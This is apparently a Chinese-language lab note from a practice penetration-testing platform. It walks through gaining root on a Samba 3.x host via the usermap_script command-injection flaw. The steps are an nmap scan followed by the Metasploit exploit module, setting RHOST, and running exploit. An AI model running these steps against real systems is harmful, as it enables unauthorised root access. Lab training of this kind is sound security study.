samba 3.x提权漏洞
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。
[实验目的]
1) 利用Samba漏洞,获得目标主机root权限
[实验原理]
1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445.
[实验环境]
[实验步骤]
一、利用nmap工具扫描目标主机
1.1 在终端中输入哪令"nmap -sV 192.168.1.3”, 对目标主机进行端口扫描,发现开放445端口、139端口并且安装samba软件。版本为3.x(注意此攻击也就适用于攻击3版本)
1.2 在终端中输入命令"msfconsole" , 启动MSF终端。
1.3 在终端中输入命令"search samba”, 搜索samba的相关I具和攻击载荷。
1.4 在终端中输入命令"use exploit/multi/samba/usermap_script" , 启用漏洞利用模块,提示符就会提示进入到该路径下。
1.5 在终端中输入命令"info” , 查看需要设置的相关项,"yes" 表示必须填写的参数。
#用命令show options看到更清楚
1.6 在终端中输入命令"set RHOST 192.168.1.3”, 设置目标主机的IP地址。
1.7 在终端中输入"exploit" 开始向目标 主机攻击,攻击成功后 ,建立会话。
1.8 在终端中输入,'whoami" ,查看获得的权限为root ,输入命令"ifconfig" ,查看系统的网络信息。